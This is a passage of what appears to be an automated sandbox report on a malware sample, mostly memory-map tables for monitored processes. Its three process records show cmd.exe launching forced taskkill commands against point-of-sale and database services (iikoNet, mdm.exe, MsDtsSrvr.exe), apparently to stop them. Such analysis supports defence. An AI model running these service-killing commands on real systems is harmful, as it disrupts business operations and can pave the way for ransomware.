|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM iikoNet.Pos.WinService.exe /IM iikoNet.Pos.WinService.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:10 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x108 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
3F8
0x
974
0x
994
0x
9A8
0x
9A4
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000e0000 | 0x000e0000 | 0x0011ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00120000 | 0x00186fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001d0000 | 0x001d0000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000250000 | 0x00250000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000400000 | 0x00400000 | 0x00587fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000005c0000 | 0x005c0000 | 0x005cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00750fff | Pagefile Backed Memory | Readable |
|
|
|
|
| taskkill.exe | 0x007a0000 | 0x007b5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x01bbffff | Pagefile Backed Memory | Readable |
|
|
|
|
| kernelbase.dll.mui | 0x01bc0000 | 0x01c7ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000001c80000 | 0x01c80000 | 0x01cbffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01d1ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d20000 | 0x01d20000 | 0x01d5ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d70000 | 0x01d70000 | 0x01daffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001de0000 | 0x01de0000 | 0x01e1ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e20000 | 0x01e20000 | 0x01f1ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x01f20000 | 0x021eefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000022d0000 | 0x022d0000 | 0x0230ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002360000 | 0x02360000 | 0x0239ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023a0000 | 0x023a0000 | 0x023dffff | Private Memory | Readable, Writable |
|
|
|
|
| ntdsapi.dll | 0x6a490000 | 0x6a4a7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a4b0000 | 0x6a545fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a550000 | 0x6a578fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a580000 | 0x6a5dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a710000 | 0x6a71efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a720000 | 0x6a729fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a7b0000 | 0x6a89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a8a0000 | 0x6a8aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a8b0000 | 0x6a8c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x6a8d0000 | 0x6a8dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a8e0000 | 0x6a914fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x73e30000 | 0x73e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #24 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM mdm.exe /IM mdm.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:26, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:09 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x9ac |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9B4
0x
9B8
0x
9BC
0x
298
0x
9F4
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x000b0000 | 0x00116fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000120000 | 0x00120000 | 0x00121fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00130000 | 0x00133fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x00377fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000390000 | 0x00390000 | 0x0040ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000410000 | 0x00410000 | 0x00590fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000005b0000 | 0x005b0000 | 0x006affff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x006b0000 | 0x0076ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000007e0000 | 0x007e0000 | 0x0081ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000890000 | 0x00890000 | 0x0089ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000008a0000 | 0x008a0000 | 0x008dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000980000 | 0x00980000 | 0x009bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009d0000 | 0x009d0000 | 0x00a0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a10000 | 0x00a10000 | 0x00b0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000b20000 | 0x00b20000 | 0x00b5ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000b90000 | 0x00b90000 | 0x00bcffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00c0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000c60000 | 0x00c60000 | 0x00c9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000d10000 | 0x00d10000 | 0x00d4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000d80000 | 0x00d80000 | 0x00dbffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00e10000 | 0x00e25fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000e30000 | 0x00e30000 | 0x0222ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x02230000 | 0x024fefff | Memory Mapped File | Readable |
|
|
|
|
| fastprox.dll | 0x6a450000 | 0x6a4e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a4f0000 | 0x6a5dafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x6a7d0000 | 0x6a7e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a7f0000 | 0x6a7fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a800000 | 0x6a828fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a830000 | 0x6a88bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a890000 | 0x6a899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a8a0000 | 0x6a8d4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a8e0000 | 0x6a8eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x6a8f0000 | 0x6a8f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a900000 | 0x6a910fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73e30000 | 0x73e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #25 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM MsDtsSrvr.exe /IM MsDtsSrvr.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:26, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:09 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xa0c |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A08
0x
A04
0x
A00
0x
9F0
0x
A10
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
